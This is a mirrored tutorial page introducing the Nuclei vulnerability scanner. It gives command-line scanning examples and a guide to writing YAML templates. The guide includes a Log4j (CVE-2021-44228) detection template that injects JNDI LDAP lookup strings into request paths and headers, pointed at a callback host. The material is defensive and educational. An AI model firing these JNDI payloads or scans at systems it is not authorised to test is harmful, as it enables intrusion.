mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-10-01 01:25:43 -04:00
152 lines
4.2 KiB
Markdown
152 lines
4.2 KiB
Markdown
# Introducing Nuclei: A Fast and Customizable Vulnerability Scanner
|
|
|
|
## Introduction
|
|
|
|
[Nuclei](https://github.com/projectdiscovery/nuclei) is an open-source, fast, and customizable vulnerability scanner developed by [ProjectDiscovery](https://github.com/projectdiscovery/). It is designed to send requests across targets based on predefined templates, enabling efficient and accurate vulnerability detection with minimal false positives. [Nuclei](https://github.com/projectdiscovery/nuclei) supports scanning for various protocols, including TCP, DNS, HTTP, SSL, File, Whois, and Websocket.
|
|
|
|
## Some of the Key Features
|
|
|
|
1. Template-based scanning: Nuclei uses YAML-based templates to define scanning logic, making it highly extensible and customizable.
|
|
|
|
2. Multi-protocol support: Enables scanning across various network protocols and services.
|
|
|
|
3. Fast and efficient: Optimized for speed, allowing rapid scanning of large numbers of hosts.
|
|
|
|
4. Low false positives: Template-based approach helps minimize false positive results.
|
|
|
|
5. Community-driven: Large repository of community-contributed templates for detecting various vulnerabilities.
|
|
|
|
6. Easy integration: Can be easily integrated into CI/CD pipelines and other automated security workflows.
|
|
|
|
## Usage Examples
|
|
|
|
### Basic Scanning
|
|
|
|
To scan a single target using Nuclei:
|
|
|
|
```bash
|
|
nuclei -u http://10.6.6.23
|
|
```
|
|
|
|
To scan multiple targets from a file:
|
|
|
|
```bash
|
|
nuclei -l targets.txt
|
|
```
|
|
|
|
### Using Specific Templates
|
|
|
|
Scan with particular templates:
|
|
|
|
```bash
|
|
nuclei -u https://example.com -t cves/ -t exposures/
|
|
```
|
|
|
|
### Filtering Templates
|
|
|
|
Scan using templates with specific tags:
|
|
|
|
```bash
|
|
nuclei -u https://example.com -tags cve,oast
|
|
```
|
|
|
|
Exclude certain tags:
|
|
|
|
```bash
|
|
nuclei -u https://example.com -etags dos,fuzz
|
|
```
|
|
|
|
### Output Formatting
|
|
|
|
Generate JSON output:
|
|
|
|
```bash
|
|
nuclei -u https://example.com -json-output results.json
|
|
```
|
|
|
|
### Rate Limiting
|
|
|
|
Limit requests per second:
|
|
|
|
```bash
|
|
nuclei -u https://example.com -rate-limit 100
|
|
```
|
|
|
|
## Creating Nuclei Templates
|
|
|
|
Nuclei templates are YAML files that define the scanning logic. Here's a basic structure of a Nuclei template:
|
|
|
|
```yaml
|
|
id: example-template
|
|
info:
|
|
name: Example Vulnerability Check
|
|
author: YourName
|
|
severity: medium
|
|
description: Checks for an example vulnerability
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/vulnerable-endpoint"
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "vulnerable string"
|
|
```
|
|
|
|
Key components of a template:
|
|
|
|
1. `id`: Unique identifier for the template
|
|
2. `info`: Metadata about the template
|
|
3. `requests`: Defines the HTTP requests to be made
|
|
4. `matchers`: Specifies conditions to identify vulnerabilities
|
|
|
|
### Example: CVE Detection Template
|
|
|
|
Here's an example template for detecting CVE-2021-44228 (Log4j vulnerability):
|
|
|
|
```yaml
|
|
id: CVE-2021-44228
|
|
|
|
info:
|
|
name: Apache Log4j RCE
|
|
author: pdteam
|
|
severity: critical
|
|
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /${jndi:ldap://{{interactsh-url}}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: ${jndi:ldap://{{interactsh-url}}}
|
|
Referer: ${jndi:ldap://{{interactsh-url}}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
- "http"
|
|
|
|
- type: regex
|
|
part: interactsh_request
|
|
regex:
|
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
|
```
|
|
|
|
This template sends requests with JNDI lookup strings in various HTTP headers and checks for DNS or HTTP callbacks to detect the Log4j vulnerability[8].
|
|
|
|
## Best Practices for Template Creation
|
|
|
|
1. Use clear and descriptive template IDs and names
|
|
2. Include accurate metadata (author, severity, description)
|
|
3. Utilize dynamic variables like `{{BaseURL}}` for flexibility
|
|
4. Implement precise matchers to reduce false positives
|
|
5. Test templates thoroughly before submission
|
|
6. Follow the [community template contributions](https://github.com/projectdiscovery/nuclei-templates/tree/main/dns)
|
|
|